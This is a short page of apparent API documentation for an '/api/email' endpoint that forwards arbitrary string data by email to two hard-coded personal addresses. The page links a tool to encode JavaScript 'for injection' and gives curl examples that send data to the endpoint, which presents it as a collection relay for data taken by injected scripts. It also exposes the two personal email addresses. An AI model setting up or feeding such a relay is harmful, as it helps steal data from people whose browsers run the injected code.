URL: /api/email
Methods: POST, GET
Features: String data forwarding via Brevo API
Default Recipients: lazcop61@hotmail.com, disabledshark@gmail.com
Use our decoder tool to encode/decode JavaScript for injection:
🚀 Open Decoder Toolcurl -X POST https://your-domain.com/api/email \
-H "Content-Type: application/json" \
-d '{
"data": "Your string data here",
"to": "custom@example.com",
"subject": "Optional subject"
}'curl -X POST https://your-domain.com/api/email \
-H "Content-Type: application/json" \
-d '{
"data": "Your string data here",
"subject": "Optional subject"
}'curl "https://your-domain.com/api/email?data=Your%20data&to=recipient@example.com"